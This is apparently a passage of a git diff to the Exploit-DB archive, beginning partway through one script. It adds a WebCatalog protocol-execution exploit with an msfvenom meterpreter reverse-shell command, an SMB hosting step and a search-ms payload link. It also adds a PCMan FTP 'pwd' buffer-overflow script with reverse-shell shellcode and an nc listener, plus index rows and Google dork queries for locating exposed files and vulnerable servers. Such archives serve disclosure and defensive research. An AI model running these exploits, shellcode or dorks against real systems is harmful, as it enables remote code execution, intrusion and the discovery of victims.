parser.add_argument("-v", "--verbose", action="store_true", help="Enable verbose mode") + + args = parser.parse_args() + send_request(args.url, args.output, args.verbose) + +if __name__ == "__main__": + main() \ No newline at end of file diff --git a/exploits/windows/remote/51765.txt b/exploits/windows/remote/51765.txt new file mode 100644 index 0000000000..8a63394f68 --- /dev/null +++ b/exploits/windows/remote/51765.txt @@ -0,0 +1,40 @@ +# Exploit Title: WebCatalog 48.4 - Arbitrary Protocol Execution +# Date: 9/27/2023 +# Exploit Author: ItsSixtyN3in +# Vendor Homepage: https://webcatalog.io/en/ +# Software Link: https://cdn-2.webcatalog.io/webcatalog/WebCatalog%20Setup%2052.3.0.exe +# Version: 48.4.0 +# Tested on: Windows +# CVE : CVE-2023-42222 + +Vulnerability summary: +WebCatalog before version 48.8 calls the Electron shell.openExternal function without verifying that the URL is for an http or https resource. This vulnerability allows an attacker to potentially execute code through arbitrary protocols on the victims machine by having users sync pages with malicious URLs. The victim has to interact with the link, which can then enable an attacker to bypass security measures for malicious file delivery. + +Exploit details: + +- Create a reverse shell file. + +msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f exe > reverse.exe + + + +- Host a reverse shell file (or otherwise) on your own SMB share using impacket (https://github.com/fortra/impacket/blob/master/examples/smbserver.py) + +python3 smbserver.py Tools -smb2support + + + +- Have the user sync a page with the payload as a renamed link + +[Friendly Link](Search-ms://query=<FileName>&crumb=location\\<attackerIP>\<attackerSMBShare>&displayname=Spoofed%20Windows%20Title) + + + +Payload: +search-ms://query=<FileName>&crumb=location\\<attackerIP>\<attackerSMBShare>&displayname=Spoofed%20Windows%20Title + +Tobias Diehl +Security Consultant +OSCP, CRTO, CEH, PenTest+, AZ-500, SC-200/300 +Pronouns: he/him +e-mail: tobias.diehl@bulletproofsi.com \ No newline at end of file diff --git a/exploits/windows/remote/51767.py b/exploits/windows/remote/51767.py new file mode 100755 index 0000000000..5e5530a60d --- /dev/null +++ b/exploits/windows/remote/51767.py @@ -0,0 +1,65 @@ +# Exploit Title: PCMan FTP Server 2.0 - 'pwd' Remote Buffer Overflow +# Date: 09/25/2023 +# Exploit Author: Waqas Ahmed Faroouqi (ZEROXINN) +# Vendor Homepage: http://pcman.openfoundry.org/ +# Software Link: https://www.exploit-db.com/apps/9fceb6fefd0f3ca1a8c36e97b6cc925d-PCMan.7z +# Version: 2.0 +# Tested on: Windows XP SP3 + +#!/usr/bin/python + +import socket + +#buffer = 'A' * 2500 +#offset = 2007 +#badchars=\x00\x0a\x0d +#return_address=0x7e429353 (USER32.dll) +#msfvenom -p windows/shell_reverse_tcp LHOST=192.168.146.130 LPORT=4444 EXITFUNC=thread -f c -b "\x00\x0a\x0d" +#nc -nvlp 4444 + +overflow = ( +"\xdb\xce\xd9\x74\x24\xf4\xba\xc1\x93\x3a\xcc\x58\x31\xc9" +"\xb1\x52\x31\x50\x17\x03\x50\x17\x83\x01\x97\xd8\x39\x7d" +"\x70\x9e\xc2\x7d\x81\xff\x4b\x98\xb0\x3f\x2f\xe9\xe3\x8f" +"\x3b\xbf\x0f\x7b\x69\x2b\x9b\x09\xa6\x5c\x2c\xa7\x90\x53" +"\xad\x94\xe1\xf2\x2d\xe7\x35\xd4\x0c\x28\x48\x15\x48\x55" +"\xa1\x47\x01\x11\x14\x77\x26\x6f\xa5\xfc\x74\x61\xad\xe1" +"\xcd\x80\x9c\xb4\x46\xdb\x3e\x37\x8a\x57\x77\x2f\xcf\x52" +"\xc1\xc4\x3b\x28\xd0\x0c\x72\xd1\x7f\x71\xba\x20\x81\xb6" +"\x7d\xdb\xf4\xce\x7d\x66\x0f\x15\xff\xbc\x9a\x8d\xa7\x37" +"\x3c\x69\x59\x9b\xdb\xfa\x55\x50\xaf\xa4\x79\x67\x7c\xdf" +"\x86\xec\x83\x0f\x0f\xb6\xa7\x8b\x4b\x6c\xc9\x8a\x31\xc3" +"\xf6\xcc\x99\xbc\x52\x87\x34\xa8\xee\xca\x50\x1d\xc3\xf4" +"\xa0\x09\x54\x87\x92\x96\xce\x0f\x9f\x5f\xc9\xc8\xe0\x75" +"\xad\x46\x1f\x76\xce\x4f\xe4\x22\x9e\xe7\xcd\x4a\x75\xf7" +"\xf2\x9e\xda\xa7\x5c\x71\x9b\x17\x1d\x21\x73\x7d\x92\x1e" +"\x63\x7e\x78\x37\x0e\x85\xeb\xf8\x67\x17\x6d\x90\x75\x17" +"\x63\x3d\xf3\xf1\xe9\xad\x55\xaa\x85\x54\xfc\x20\x37\x98" +"\x2a\x4d\x77\x12\xd9\xb2\x36\xd3\x94\xa0\xaf\x13\xe3\x9a" +"\x66\x2b\xd9\xb2\xe5\xbe\x86\x42\x63\xa3\x10\x15\x24\x15" +"\x69\xf3\xd8\x0c\xc3\xe1\x20\xc8\x2c\xa1\xfe\x29\xb2\x28" +"\x72\x15\x90\x3a\x4a\x96\x9c\x6e\x02\xc1\x4a\xd8\xe4\xbb" +"\x3c\xb2\xbe\x10\x97\x52\x46\x5b\x28\x24\x47\xb6\xde\xc8" +"\xf6\x6f\xa7\xf7\x37\xf8\x2f\x80\x25\x98\xd0\x5b\xee\xb8" +"\x32\x49\x1b\x51\xeb\x18\xa6\x3c\x0c\xf7\xe5\x38\x8f\xfd" +"\x95\xbe\x8f\x74\x93\xfb\x17\x65\xe9\x94\xfd\x89\x5e\x94" +"\xd7") + +shellcode = 'A' * 2007 + "\x53\x93\x42\x7e" + "\x90" * 32 + overflow + +# Change IP/Port as required + +s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + +try: + print "\nSending evil buffer..." + s.connect(('192.168.146.135',21)) + data = s.recv(1024) + s.send('USER anonymous' +'\r\n') + data = s.recv(1024) + s.send('PASS anonymous\r\n') + s.send('pwd ' + shellcode + '\r\n') + s.close() + print "\nExploit completed successfully!." +except: + print "Could not connect to FTP!" \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 5fa49729d7..3ba9c7364e 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -3036,6 +3036,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 51053,exploits/hardware/dos/51053.txt,"DLink DIR 819 A1 - Denial of Service",2023-03-25,whokilleddb,dos,hardware,,2023-03-25,2023-03-25,0,CVE-2022-40946,,,,, 32305,exploits/hardware/dos/32305.txt,"Dreambox - Web Interface URI Remote Denial of Service",2008-08-29,"Marc Ruef",dos,hardware,,2008-08-29,2014-03-17,1,,,,,,https://www.securityfocus.com/bid/30919/info 19513,exploits/hardware/dos/19513.txt,"Eicon Networks DIVA LAN ISDN Modem 1.0 Release 2.5/1.0/2.0 - Denial of Service",1999-09-27,"Bjorn Stickler",dos,hardware,,1999-09-27,2012-07-01,1,CVE-1999-1533;OSVDB-13556,,,,,https://www.securityfocus.com/bid/665/info +51774,exploits/hardware/dos/51774.txt,"Electrolink FM/DAB/TV Transmitter - Unauthenticated Remote DoS",2024-02-02,LiquidWorm,dos,hardware,,2024-02-02,2024-02-02,0,,,,,, 18688,exploits/hardware/dos/18688.txt,"EMC Data Protection Advisor 5.8.1 - Denial of Service",2012-03-31,"Luigi Auriemma",dos,hardware,,2012-03-31,2012-03-31,1,OSVDB-80815;OSVDB-80814;CVE-2012-0407;CVE-2012-0406,,,,,http://www.emc.com/backup-and-recovery/data-protection-advisor/data-protection-advisor.htm 18734,exploits/hardware/dos/18734.txt,"EMC IRM License Server 4.6.1.1995 - Denial of Service",2012-04-12,"Luigi Auriemma",dos,hardware,,2012-04-12,2012-04-12,1,OSVDB-81147;OSVDB-81146;CVE-2012-2277;CVE-2012-2276,,,,, 21791,exploits/hardware/dos/21791.txt,"Enterasys SSR8000 SmartSwitch - Port Scan Denial of Service",2002-09-13,"Mella Marco",dos,hardware,,2002-09-13,2012-10-07,1,CVE-2002-1501;OSVDB-10063,,,,,https://www.securityfocus.com/bid/5703/info @@ -4337,6 +4338,11 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 48763,exploits/hardware/webapps/48763.txt,"Eibiz i-Media Server Digital Signage 3.8.0 - Authentication Bypass",2020-08-24,LiquidWorm,webapps,hardware,,2020-08-24,2020-08-24,0,,,,,, 48764,exploits/hardware/webapps/48764.txt,"Eibiz i-Media Server Digital Signage 3.8.0 - Configuration Disclosure",2020-08-24,LiquidWorm,webapps,hardware,,2020-08-24,2020-08-24,0,,,,,, 48774,exploits/hardware/webapps/48774.py,"Eibiz i-Media Server Digital Signage 3.8.0 - Privilege Escalation",2020-08-28,LiquidWorm,webapps,hardware,,2020-08-28,2020-08-28,0,,,,,, +51771,exploits/hardware/webapps/51771.txt,"Electrolink FM/DAB/TV Transmitter (controlloLogin.js) - Credentials Disclosure",2024-02-02,LiquidWorm,webapps,hardware,,2024-02-02,2024-02-02,0,,,,,, +51772,exploits/hardware/webapps/51772.txt,"Electrolink FM/DAB/TV Transmitter (Login Cookie) - Authentication Bypass",2024-02-02,LiquidWorm,webapps,hardware,,2024-02-02,2024-02-02,0,,,,,, +51770,exploits/hardware/webapps/51770.txt,"Electrolink FM/DAB/TV Transmitter (login.htm/mail.htm) - Credentials Disclosure",2024-02-02,LiquidWorm,webapps,hardware,,2024-02-02,2024-02-02,0,,,,,, +51775,exploits/hardware/webapps/51775.txt,"Electrolink FM/DAB/TV Transmitter - Pre-Auth MPFS Image Remote Code Execution",2024-02-02,LiquidWorm,webapps,hardware,,2024-02-02,2024-02-02,0,,,,,, +51773,exploits/hardware/webapps/51773.py,"Electrolink FM/DAB/TV Transmitter - Remote Authentication Removal",2024-02-02,LiquidWorm,webapps,hardware,,2024-02-02,2024-02-02,0,,,,,, 42252,exploits/hardware/webapps/42252.txt,"Eltek SmartPack - Backdoor Account",2017-06-26,"Saeed reza Zamanian",webapps,hardware,,2017-06-26,2017-06-26,0,,,,,, 47623,exploits/hardware/webapps/47623.txt,"eMerge E3 1.00-06 - 'layout' Reflected Cross-Site Scripting",2019-11-12,LiquidWorm,webapps,hardware,,2019-11-12,2019-11-12,0,CVE-2019-7255,,,,, 47622,exploits/hardware/webapps/47622.py,"eMerge E3 1.00-06 - Arbitrary File Upload",2019-11-12,LiquidWorm,webapps,hardware,,2019-11-12,2019-11-12,0,CVE-2019-7257,,,,, @@ -4898,6 +4904,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 34583,exploits/hardware/webapps/34583.txt,"TP-Link TL-WR340G / TL-WR340GD - Multiple Vulnerabilities",2014-09-08,smash,webapps,hardware,80,2014-09-09,2014-09-09,0,OSVDB-111720;OSVDB-111712;OSVDB-111711;OSVDB-111708;OSVDB-111707;OSVDB-111706;OSVDB-111705;OSVDB-111704;OSVDB-111703;OSVDB-100357;OSVDB-100355,,,,, 51606,exploits/hardware/webapps/51606.txt,"TP-Link TL-WR740N - Authenticated Directory Transversal",2023-07-19,"Anish Feroz",webapps,hardware,,2023-07-19,2023-07-19,0,,,,,, 43148,exploits/hardware/webapps/43148.txt,"TP-Link TL-WR740N - Cross-Site Scripting",2017-11-16,bl00dy,webapps,hardware,,2017-11-16,2017-11-16,0,,,,,, +51769,exploits/hardware/webapps/51769.txt,"TP-LINK TL-WR740N - Multiple HTML Injection",2024-02-02,"Shujaat Amin (ZEROXINN)",webapps,hardware,,2024-02-02,2024-02-02,0,,,,,, +51768,exploits/hardware/webapps/51768.txt,"TP-Link TL-WR740N - UnAuthenticated Directory Transversal",2024-02-02,"Syed Affan Ahmed (ZEROXINN)",webapps,hardware,,2024-02-02,2024-02-02,0,,,,,, 34254,exploits/hardware/webapps/34254.txt,"TP-Link TL-WR740N v4 Router (FW-Ver. 3.16.6 Build 130529 Rel.47286n) - Command Execution",2014-08-03,"Christoph Kuhl",webapps,hardware,,2014-08-03,2016-09-12,0,OSVDB-109840;OSVDB-109839,,,,, 46882,exploits/hardware/webapps/46882.txt,"TP-LINK TL-WR840N v5 00000005 - Cross-Site Scripting",2019-05-21,"purnendu ghosh",webapps,hardware,,2019-05-21,2019-05-21,0,CVE-2019-12195,"Cross-Site Scripting (XSS)",,,, 44781,exploits/hardware/webapps/44781.txt,"TP-Link TL-WR840N/TL-WR841N - Authenticaton Bypass",2018-05-28,"BlackFog Team",webapps,hardware,,2018-05-28,2018-05-28,0,,,,,, @@ -22021,6 +22029,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 3799,exploits/php/webapps/3799.txt,"JulmaCMS 1.4 - 'file.php' Remote File Disclosure",2007-04-25,GoLd_M,webapps,php,,2007-04-24,2016-09-30,1,OSVDB-35387;CVE-2007-2324,,,,http://www.exploit-db.comjulma.zip, 2628,exploits/php/webapps/2628.pl,"JumbaCMS 0.0.1 - '/includes/functions.php' Remote File Inclusion",2006-10-23,Kw3[R]Ln,webapps,php,,2006-10-22,,1,OSVDB-35737;CVE-2006-6635,,,,, 29544,exploits/php/webapps/29544.txt,"Juniper Junos J-Web - Privilege Escalation",2013-11-12,"Sense of Security",webapps,php,,2013-11-25,2013-11-25,0,CVE-2013-6618;OSVDB-92227,,,,, +51776,exploits/php/webapps/51776.py,"Juniper-SRX-Firewalls&EX-switches - (PreAuth-RCE) (PoC)",2024-02-02,whiteOwl,webapps,php,,2024-02-02,2024-02-02,0,,,,,, 4781,exploits/php/webapps/4781.php,"Jupiter 1.1.5ex - Privilege Escalation",2007-12-24,BugReport.IR,webapps,php,,2007-12-23,,1,OSVDB-52931,,,,,http://www.bugreport.ir/?/23 28582,exploits/php/webapps/28582.txt,"Jupiter CMS 1.1.4/1.1.5 - '/modules/blocks.php' Multiple Cross-Site Scripting Vulnerabilities",2006-09-15,"HACKERS PAL",webapps,php,,2006-09-15,2013-09-28,1,CVE-2006-4874;OSVDB-31529,,,,,https://www.securityfocus.com/bid/20048/info 28584,exploits/php/webapps/28584.txt,"Jupiter CMS 1.1.4/1.1.5 - '/modules/mass-email.php' Multiple Cross-Site Scripting Vulnerabilities",2006-09-15,"HACKERS PAL",webapps,php,,2006-09-15,2013-09-28,1,CVE-2006-4874;OSVDB-31531,,,,,https://www.securityfocus.com/bid/20048/info @@ -23630,6 +23639,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 51115,exploits/php/webapps/51115.txt,"Moodle LMS 4.0 - Cross-Site Scripting (XSS)",2023-03-28,"Saud Alenazi",webapps,php,,2023-03-28,2023-03-28,0,,,,,, 4951,exploits/php/webapps/4951.txt,"Mooseguy Blog System 1.0 - 'month' SQL Injection",2008-01-21,The_HuliGun,webapps,php,,2008-01-20,2016-11-14,1,OSVDB-40959;CVE-2008-0424,,,,http://www.exploit-db.commgbs_1.0.zip, 27871,exploits/php/webapps/27871.txt,"mooSocial 1.3 - Multiple Vulnerabilities",2013-08-26,Esac,webapps,php,,2013-08-26,2013-08-26,0,OSVDB-96633;OSVDB-96632;OSVDB-96631;OSVDB-96630;OSVDB-96629;OSVDB-96628;OSVDB-96627;OSVDB-96626;OSVDB-96625;OSVDB-96624,,,,, +51766,exploits/php/webapps/51766.txt,"mooSocial 3.1.8 - Cross-Site Scripting (XSS) on User Login Page",2024-02-02,"Astik Rawat",webapps,php,,2024-02-02,2024-02-02,0,,,,,, 51670,exploits/php/webapps/51670.txt,"mooSocial 3.1.8 - Reflected XSS",2023-08-08,CraCkEr,webapps,php,,2023-08-08,2023-08-08,1,CVE-2023-4173,,,,, 45330,exploits/php/webapps/45330.txt,"mooSocial Store Plugin 2.6 - SQL Injection",2018-09-04,"Andrea Bocchetti",webapps,php,,2018-09-04,2018-09-06,0,,"SQL Injection (SQLi)",,,, 9121,exploits/php/webapps/9121.php,"Morcego CMS 1.7.6 - Blind SQL Injection",2009-07-10,darkjoker,webapps,php,,2009-07-09,,1,OSVDB-55796;CVE-2009-3713,,,,, @@ -44654,6 +44664,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 28512,exploits/windows/remote/28512.txt,"paul smith computer services vcap Calendar server 1.9 - Directory Traversal",2009-09-12,"securma massine",remote,windows,,2009-09-12,2013-09-25,1,CVE-2006-5034;OSVDB-28808,,,,,https://www.securityfocus.com/bid/19958/info 4526,exploits/windows/remote/4526.html,"PBEmail 7 - ActiveX Edition Insecure Method",2007-10-12,Katatafish,remote,windows,,2007-10-11,,1,OSVDB-43481;CVE-2007-5446,,,,, 39662,exploits/windows/remote/39662.rb,"PCMan FTP Server - 'PUT' Buffer Overflow (Metasploit)",2016-04-05,Metasploit,remote,windows,21,2016-04-05,2016-10-31,1,OSVDB-94624,"Metasploit Framework (MSF)",,,http://www.exploit-db.comPCMan.7z, +51767,exploits/windows/remote/51767.py,"PCMan FTP Server 2.0 - 'pwd' Remote Buffer Overflow",2024-02-02,"Waqas Ahmed Faroouqi",remote,windows,,2024-02-02,2024-02-02,0,,,,,, 26495,exploits/windows/remote/26495.py,"PCMan FTP Server 2.0 - Remote Buffer Overflow",2013-06-30,Chako,remote,windows,,2013-06-30,2013-06-30,0,OSVDB-94624;CVE-2013-4730,,,,http://www.exploit-db.comPCMan.7z, 40704,exploits/windows/remote/40704.py,"PCMan FTP Server 2.0.7 - 'ACCT' Remote Buffer Overflow",2016-11-03,Cybernetic,remote,windows,,2016-11-03,2016-11-03,1,,,,http://www.exploit-db.com/screenshots/idlt41000/screen-shot-2016-11-03-at-182757.png,http://www.exploit-db.comPCMan.7z, 40670,exploits/windows/remote/40670.py,"PCMan FTP Server 2.0.7 - 'DELETE' Remote Buffer Overflow",2016-10-31,ScrR1pTK1dd13,remote,windows,,2016-10-31,2016-11-02,1,,,,http://www.exploit-db.com/screenshots/idlt41000/screen-shot-2016-10-31-at-233222.png,http://www.exploit-db.comPCMan.7z, @@ -45378,6 +45389,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 1374,exploits/windows/remote/1374.pl,"Watchfire AppScan QA 5.0.x - Remote Code Execution",2005-12-15,"Mariano Nuñez",remote,windows,,2005-12-14,,1,OSVDB-21746;CVE-2005-4270,,,,, 23514,exploits/windows/remote/23514.pl,"Webcam Corp Webcam Watchdog 1.0/1.1/3.63 Web Server - Remote Buffer Overflow",2004-01-04,"Peter Winter-Smith",remote,windows,,2004-01-04,2012-12-20,1,CVE-2004-1784;OSVDB-3312,,,,,https://www.securityfocus.com/bid/9351/info 7521,exploits/windows/remote/7521.txt,"WebcamXP 5.3.2.375 - Remote File Disclosure",2008-12-19,nicx0,remote,windows,,2008-12-18,,1,OSVDB-50884;CVE-2008-5862,,,,, +51765,exploits/windows/remote/51765.txt,"WebCatalog 48.4 - Arbitrary Protocol Execution",2024-02-02,ItsSixtyN3in,remote,windows,,2024-02-02,2024-02-02,0,,,,,, 16550,exploits/windows/remote/16550.rb,"WebDAV - Application DLL Hijacker (Metasploit)",2010-09-24,Metasploit,remote,windows,,2010-09-24,2011-03-10,1,,"Metasploit Framework (MSF)",,,, 3913,exploits/windows/remote/3913.c,"webdesproxy 0.0.1 - GET Remote Buffer Overflow",2007-05-12,vade79,remote,windows,8080,2007-05-11,2016-09-29,1,OSVDB-40741;CVE-2007-2668,,,,http://www.exploit-db.comwebdesproxy-win32.tgz, 37165,exploits/windows/remote/37165.py,"WebDrive 12.2 (Build #4172) - Remote Buffer Overflow",2015-06-01,metacom,remote,windows,,2015-06-01,2016-03-08,1,,,,,, diff --git a/ghdb.xml b/ghdb.xml index b58aeab7df..9f94ad5427 100644 --- a/ghdb.xml +++ b/ghdb.xml @@ -32887,6 +32887,19 @@ Dxtroyer</textualDescription> <date>2017-06-09</date> <author>anonymous</author> </entry> + <entry> + <id>8401</id> + <link>https://www.exploit-db.com/ghdb/8401</link> + <category>Files Containing Juicy Info</category> + <shortDescription>"Started by upstream project" ext:txt</shortDescription> + <textualDescription>Author: nadirb19 +Google Dork: "Started by upstream project" ext:txt</textualDescription> + <query>"Started by upstream project" ext:txt</query> + <querystring>https://www.google.com/search?q="Started by upstream project" ext:txt</querystring> + <edb></edb> + <date>2024-02-02</date> + <author>nadirb19</author> + </entry> <entry> <id>4162</id> <link>https://www.exploit-db.com/ghdb/4162</link> @@ -34966,6 +34979,20 @@ Twitter: https://www.twitter.com/la_usch <date>2004-10-16</date> <author>anonymous</author> </entry> + <entry> + <id>8400</id> + <link>https://www.exploit-db.com/ghdb/8400</link> + <category>Files Containing Juicy Info</category> + <shortDescription>ext:java intext:"executeUpdate"</shortDescription> + <textualDescription># Exploit Title: Sensitive data in java files +# Google Dork: ext:java intext:"executeUpdate" +# Exploit Author: BULLETMHS</textualDescription> + <query>ext:java intext:"executeUpdate"</query> + <querystring>https://www.google.com/search?q=ext:java intext:"executeUpdate"</querystring> + <edb></edb> + <date>2024-02-02</date> + <author>BULLETMHS</author> + </entry> <entry> <id>7917</id> <link>https://www.exploit-db.com/ghdb/7917</link> @@ -116819,6 +116846,19 @@ Linkedin: https://www.linkedin.com/in/hemantsolo/ <date>2020-06-08</date> <author>Hemant Patidar</author> </entry> + <entry> + <id>8402</id> + <link>https://www.exploit-db.com/ghdb/8402</link> + <category>Vulnerable Servers</category> + <shortDescription>intitle:"Installation Wizard - PowerCMS v2"</shortDescription> + <textualDescription>Author: nadirb19 +Dork: intitle:"Installation Wizard - PowerCMS v2"</textualDescription> + <query>intitle:"Installation Wizard - PowerCMS v2"</query> + <querystring>https://www.google.com/search?q=intitle:"Installation Wizard - PowerCMS v2"</querystring> + <edb></edb> + <date>2024-02-02</date> + <author>nadirb19</author> + </entry> <entry> <id>753</id> <link>https://www.exploit-db.com/ghdb/753</link> @@ -116940,6 +116980,20 @@ Demewoz Agegnehu | Sabean Technology | https://sabtechx.com</textualDescription> <date>2020-10-01</date> <author>Alexandros Pappas</author> </entry> + <entry> + <id>8403</id> + <link>https://www.exploit-db.com/ghdb/8403</link> + <category>Vulnerable Servers</category> + <shortDescription>intitle:"Welcome to iTop version" wizard</shortDescription> + <textualDescription>Author: nadirb19 +Dork: intitle:"Welcome to iTop version" wizard +</textualDescription> + <query>intitle:"Welcome to iTop version" wizard</query> + <querystring>https://www.google.com/search?q=intitle:"Welcome to iTop version" wizard</querystring> + <edb></edb> + <date>2024-02-02</date> + <author>nadirb19</author> + </entry> <entry> <id>6419</id> <link>https://www.exploit-db.com/ghdb/6419</link>